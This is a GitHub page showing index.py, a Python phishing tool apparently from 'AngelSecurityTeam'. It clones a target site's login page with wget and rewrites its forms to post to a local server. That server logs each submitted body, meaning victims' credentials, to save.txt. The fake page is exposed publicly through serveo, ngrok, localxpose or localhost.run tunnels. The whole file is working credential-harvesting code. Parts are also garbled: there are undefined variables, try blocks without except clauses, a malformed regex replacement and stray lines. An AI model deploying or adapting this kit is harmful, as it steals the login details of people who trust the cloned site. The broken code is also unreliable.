-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathindex.py
266 lines (216 loc) · 22.7 KB
/
index.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
from subprocess import check_output,CalledProcessError
from time import sleep
import os
import http.server
import socketserver
import re
import ssl
from os import system
import sys
GREEN = "\033[1;31m"
RED = "\033[1;31m"
RESET = "\033[1;31m"
os.system("fuser -k -n tcp 8080")
os.system("fuser -k -n tcp 80")
os.system("rm -rf .tmp")
os.system("mkdir .tmp")
os.system("clear")
def BANNER():
print ("""\n\033[1;33m\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97 \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97 \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97 \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97 \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97 \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97 \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97 \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97 \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97 \xe2\x96\x88\xe2\x96\x88\xe2\x95\x97 \xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97 \xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97 \xe2\x96\x88\xe2\x96\x88\xe2\x95\x97 \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97 \n\033[1;38m\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97 \xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91 \xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91 \xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97 \xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d \n\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x9d\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97 \xe2\x96\x88\xe2\x96\x88\xe2\x95\x91 \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x9d\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97 \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91 \xe2\x96\x88\xe2\x96\x88\xe2\x95\x91 \xe2\x96\x88\xe2\x96\x88\xe2\x95\x91 \xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x9d \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x9d\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97 \xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91 \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\n\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d \xe2\x96\x88\xe2\x96\x88\xe2\x95\x91 \xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d \xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91 \xe2\x96\x88\xe2\x96\x88\xe2\x95\x91 \xe2\x96\x88\xe2\x96\x88\xe2\x95\x91 \xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97 \xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d \xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x95\x9a\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91 \xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\n\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91 \xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x95\x9a\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91 \xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91 \xe2\x96\x88\xe2\x96\x88\xe2\x95\x91 \xe2\x96\x88\xe2\x96\x88\xe2\x95\x91 \xe2\x95\x9a\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x9d\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91 \xe2\x96\x88\xe2\x96\x88\xe2\x95\x91 \xe2\x96\x88\xe2\x96\x88\xe2\x95\x91 \xe2\x96\x88\xe2\x96\x88\xe2\x95\x91 \xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91 \xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91 \xe2\x95\x9a\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x95\x9a\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x9d\n\033[1;39m\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d \xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d \xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d \xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d \xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d \xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d \xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d \xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d \xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d \xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d \xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d \xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d \xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d \xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d \xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d v.4\n\033[1;33mAngelSecurityTeam \n\033[1;33m [@]\033[1;39murl \033[1;33m= \033[1;39mhttps://www.example.com \033[1;33m [@]\033[1;39mport \033[1;33m= \033[1;39m8080\n\n """)
BANNER()
CURRENT_PATH = os.getcwd()
DIRKR = os.path.join(CURRENT_PATH, ".tmp")
INDEX_LOGIN = os.path.join(DIRKR, "index.html")
POST_SAVE = os.path.join(CURRENT_PATH, "save.txt")
NO = { "no", "n" }
nuse_wget = "Y"
if use_wget.lower() not in NO:
url = input(" \033[1;33m[@]\033[1;39murl \033[1;33m= \033[1;39m")
user_agent = "Mozilla/5.0"
PORT=int(input("\n \033[1;33m[@]\033[1;39mport \033[1;33m= \033[1;39m"))
port22=PORT
print("\033[1;31m")
os.system("wget -E -H -k -K -p -nH --cut-dirs=100 --referer=http://www.google.com -nv {} --user-agent {} --directory-prefix={}".format(url, user_agent, DIRKR))
os.system("cp ngrok .tmp")
os.system("cp loclx .tmp")
os.system("clear")
else:
print("")
if not os.path.isfile(INDEX_LOGIN):
html_files_in_web = []
for file in os.listdir(DIRKR):
if file.endswith(".html") or file.endswith(".htm"):
html_files_in_web.append(os.path.join(DIRKR, file))
if len(html_files_in_web) == 1:
os.rename(os.path.join(DIRKR, html_files_in_web[0]), INDEX_LOGIN)
else:
print("\033[1;33mmain page not defined :")
index_filename = input("\033[1;39m\n file in \033[1;33m .tmp/\033[1;39m define a home page:\033[1;33m")
os.rename(os.path.join(DIRKR, index_filename), INDEX_LOGIN)
print("")
redirect_ip = url
page12 = open(INDEX_LOGIN, "r").read()
forms_pattern = '(<form[^>]*?action=")([^"]*)("[^>]*>)'
page12 = re.sub(forms_pattern, "1\\redict\3", page12)
with open(INDEX_LOGIN, "wb") as file:
file.write(str.encode(page12))
class SimpleHTTPRequestHandler(http.server.SimpleHTTPRequestHandler):
def do_GET(self):
if os.path.exists(self.translate_path(self.path)):
f = self.send_head()
if f:
self.copyfile(f, self.wfile)
f.close()
else:
remote_path = "{}{}".format(redirect_ip, self.path)
self.send_response(303)
self.send_header("Location", remote_path)
self.end_headers()
def do_POST(self):
content_length = int(self.headers["Content-Length"])
body = self.rfile.read(content_length)
if self.path == "/redict":
sys.stdout.write(GREEN)
print("\n\tfile saved in -> save.txt ...")
sys.stdout.write(RESET)
self.send_response(303)
self.send_header("Location", "{}".format(redirect_ip))
with open(POST_SAVE, "a+") as file:
file.write(body.decode("utf-8"))
file.write("\n\n")
else:
self.send_response(308)
self.send_header("Location", "https://{}{}".format(redirect_ip,self.path))
self.end_headers()
def log_message(self, format, *args):
return
def serverserveo():
port11122=PORT
os.system("ssh -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -R 80:localhost:%s serveo.net > link.url 2> /dev/null &"%(port11122))
sleep(8)
try:
sleep(8)
output = check_output("grep -o \'https://[0-9a-z]*\.serveo.net\' link.url", shell=True)
urlserveo = str(output).strip("b \' \ n")
print("\n\t\033[1;33mSERVEO URL \033[1;39m: ",urlserveo)
sleep(4)
def subdomainserveo():
port111=PORT
linkserveo = input("\n\t\033[1;33mSUBDOMAIN : \033[1;39m")
if not ".serveo.net" in linkserveo:
linkserveo += ".serveo.net"
else:
pass
os.system("ssh -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -o ServerAliveCountMax=60 -R %s:80:localhost:%s serveo.net > link111.url 2> /dev/null &" % (linkserveo, port111))
sleep(8)
try:
sleep(8)
output = check_output("grep -o \'.\{0,0\}http.\{0,100\}\' link111.url",shell=True)
urlserveo2 = str(output).strip("b \' \ n r")
print("\n\t\033[1;33mSERVEO URL \033[1;39m: ",urlserveo2)
except CalledProcessError:
sleep(8)
print ("\n\033[1;33\t FFAILED TO GET THIS DOMAIN \033[1;39m ")
return subdomainserveo()
def subdomainxpose():
port222=PORT
linkxpose = input("\n\t\033[1;33mSUBDOMAIN : \033[1;39m")
os.system("./loclx tunnel http --to :%s --subdomain %s > link222.url 2> /dev/null &" % (port222,linkxpose))
sleep(8)
try:
sleep(8)
output = check_output("grep -o \'https://[0-9a-z]*\.loclx.io\' link222.url",shell=True)
urlxpose2 = str(output).strip("b \' \ n r")
print("\n\t\033[1;33mLOCALXPOSE URL \033[1;39m: ",urlxpose2)
except CalledProcessError:
sleep(4)
print ("\n\033[1;33\t FFAILED TO GET THIS DOMAIN \033[1;39m ")
return subdomainxpose()
def serverngrok():
port22=PORT
os.system("chmod +x ngrok")
os.system("./ngrok http {} > /dev/null &".format(port22))
sleep(8)
os.system("curl -s -N http://127.0.0.1:4040/api/tunnels | grep https://[0-9a-z]*\.ngrok.io" -oh > link2.url)
urlFile = open("link2.url", "r")
url = urlFile.read()
urlFile.close()
if re.match("https://[0-9a-z]*\.ngrok.io", url) != None:
print("\n\t\033[1;33mNGROK URL \033[1;39m: " + url)
def serverLocalrun():
port33333=PORT
os.system("xterm -hold -e \'ssh -T -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -o ServerAliveCountMax=60 -R 80:localhost:%s ssh.localhost.run > link44.url &"%(port33333))
sleep(8)
os.system("grep -o \'.\{0,0\}https.\{0,50\}\' link44.url")
try:
sleep(8)
output = check_output("grep -o .\{0,0\}https.\{0,50\} link44.url", shell=True)
urlserveo = str(output).strip("b \' \ n")
print("\n\t\033[1;33mSERVER LOCALRUN \033[1;39m: ",urlserveo+"n")
except CalledProcessError:
sleep(4)
return serverLocalrun()\
os.system("ssh -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -R 80:localhost:%s ssh.localhost.run > link44.url &"%(port33333))
sleep(8)
try:
sleep(20)
output = check_output("grep -o \'.\{0,0\}https.\{0,100\}\' link44.url", shell=True)
urlserveo = str(output).strip("b \' \ n")
print("\n\t\033[1;33mSERVEO LOCALRUN \033[1;39m: ",urlserveo)
except CalledProcessError:
sleep(4)
return serverserveo()
def serverxpose():
port33=PORT
os.system("./loclx tunnel http --to :%s > link3.url 2> /dev/null &" % (port33))
sleep(8)
try:
sleep(8)
output = check_output("grep -o \'https://[0-9a-z]*\.loclx.io\' link3.url",shell=True)
url = str(output).strip("b \' \ n r")
print("\n\t\033[1;33mLOCALXPOSE URL \033[1;39m: "+ url)
except CalledProcessError:
sleep(4)
return serverxpose()
def launch_server(port):
os.chdir(DIRKR)
httpd = socketserver.TCPServer(("", port), SimpleHTTPRequestHandler)
print("\\t\\033[1;33m[@]\\033[1;39murl\\033[1;33m =\\033[1;39m ",url," ","\\033[1;33m[@]\\033[1;39mport\\033[1;33m = \\033[1;39m", PORT)
print("\\n\\t\\033[1;33mSTART SERVER : ")
print("\\n\\t\\033[1;33m1)\\033[1;39mSERVEO ")
print("\\n\\t\\033[1;33m2)\\033[1;39mNGROK ")
print("\\n\\t\\033[1;33m3)\\033[1;39mLOCALXPOSE ")
print("\\n\\t\\033[1;33m4)\\033[1;39mLOCALHOST ")
print("\\n\\t\\033[1;33m5)\\033[1;39mLOCALRUN ")
select=int(input("\\n\\t\\033[1;33mOPTIONS : \\033[1;39m"))
if select==1:
print("\\n\\t\\033[1;33m1)\\033[1;39mSUBDOMAIN ")
print("\\n\\t\\033[1;33m2)\\033[1;39mRANDOM DOMAIN ")
select2=int(input("\\n\\t\\033[1;33mOPTIONS : \\033[1;39m"))
if select2==1:
subdomainserveo()
serverserveo()
elif select==2:
serverngrok()
elif select==3:
print("\\n\\t\\033[1;33m1)\\033[1;39mSUBDOMAIN ")
print("\\n\\t\\033[1;33m2)\\033[1;39mRANDOM DOMAIN ")
select3=int(input("\\n\\t\\033[1;33mOPTIONS : \\033[1;39m"))
if select3==1:
subdomainxpose()
elif select== 4:
print("\\n\\t\\033[1;33mSERVER \\033[1;39m: http://localhost:{}".format(port))
elif select==5:
serverLocalrun()
else:
serverngrok()
port33333=8080
os.system("ssh -T -R 80:localhost:%s ssh.localhost.run > link44.url 2> /dev/null &"%(port33333))
httpd.serve_forever()
#Can't find where \/ belongs to.
# except KeyboardInterrupt:
# sys.stdout.write(RED)
# sys.stdout.write(RESET)
# os.system("rm -rf .tmp")
# httpd.server_close()
# launch_server(PORT)